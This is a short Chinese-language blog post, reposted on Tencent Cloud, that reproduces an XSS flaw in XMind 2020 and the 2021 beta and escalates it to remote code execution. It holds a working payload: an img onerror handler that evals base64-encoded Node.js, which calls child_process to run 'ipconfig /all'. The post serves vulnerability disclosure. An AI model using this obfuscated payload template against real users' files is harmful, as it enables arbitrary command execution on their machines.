首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >XMind xss漏洞&任意代码执行

XMind xss漏洞&任意代码执行

作者头像
用户8478399
发布2022-09-22 19:16:40
发布2022-09-22 19:16:40
3650
举报
文章被收录于专栏:White OWLWhite OWL

简介:

XMind是一种功能齐全的思维导图和头脑风暴工具,旨在产生想法,激发创造力,并在工作和生活中带来效率。数以百万计的用户们喜欢它。

漏洞版本:

XMind2020及2021beta版本

下载链接:

https://www.xmind.cn/download/

https://www.xmind.cn/xmind2021/beta/

漏洞复现:

Xss语句:
代码语言:javascript
复制
<audio src=x onerror=confirm("666")>

位置:

远程代码执行:

代码语言:javascript
复制
<img src=# onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lwY29uZmlnIC9hbGwnLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=`,`base64`).toString())'>

这里执行ipconfig/all

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-05-11,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 White OWL 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 简介:
  • 漏洞版本:
  • 下载链接:
    • Xss语句:
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档